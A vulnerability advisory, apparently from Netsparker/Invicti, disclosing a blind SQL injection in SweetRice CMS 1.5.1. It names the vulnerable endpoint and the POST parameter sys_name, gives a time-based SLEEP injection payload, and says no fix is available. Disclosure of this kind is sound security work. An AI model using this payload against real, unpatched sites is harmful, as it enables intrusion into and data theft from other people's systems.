Blind SQL Injection Vulnerability in SweetRice 1.5.1

Information

Advisory by Netsparker (now Invicti)
Name: Blind SQL Injection Vulnerability in SweetRice
Affected Software: SweetRice
Affected Versions: 1.5.1
Vendor Homepage: http://www.basic-cms.org/ 
Vulnerability Type: Blind SQL Injection
Severity: Critical
Status: Not Fixed
Invicti Advisory Reference: NS-17-005

Technical Details

Proof of Concept URL for Blind SQL Injection vulnerability in SweetRice;

URL: /SweetRice-1.5.1/as/?type=post&mode=insert
Parameter Name: sys_name
Parameter Type: POST
Attack Pattern: '+((SELECT 1 FROM (SELECT SLEEP(25))A))+'

For more information on SQL Injection vulnerabilities read the article SQL Injection.

Advisory Timeline

24 Nov 2016 – Issue reported
Nov 2016 – Feb 2017 – Several attempts to get in touch
01 Feb 2017 – Advisory released

Solution

No solution is available.

Credits & Authors

This issue has been discovered by Emre Iyidogan while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.